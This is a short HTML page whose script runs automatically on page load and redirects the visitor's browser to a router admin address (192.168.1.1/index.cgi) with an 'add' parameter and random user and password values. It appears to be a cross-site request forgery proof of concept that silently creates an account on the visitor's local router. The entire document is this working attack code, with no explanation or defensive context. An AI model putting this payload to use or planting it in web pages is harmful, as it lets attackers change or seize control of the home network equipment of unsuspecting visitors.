<body onload="javascript:redirekt_test();"> <script> function redirekt_test() { addr = 'http://192.168.1.1/index.cgi?add=1&U=' + Math.round(Math.random() * 999999) + '&P=' + Math.round(Math.random() * 999999); window.location.replace(addr); } </script> </body>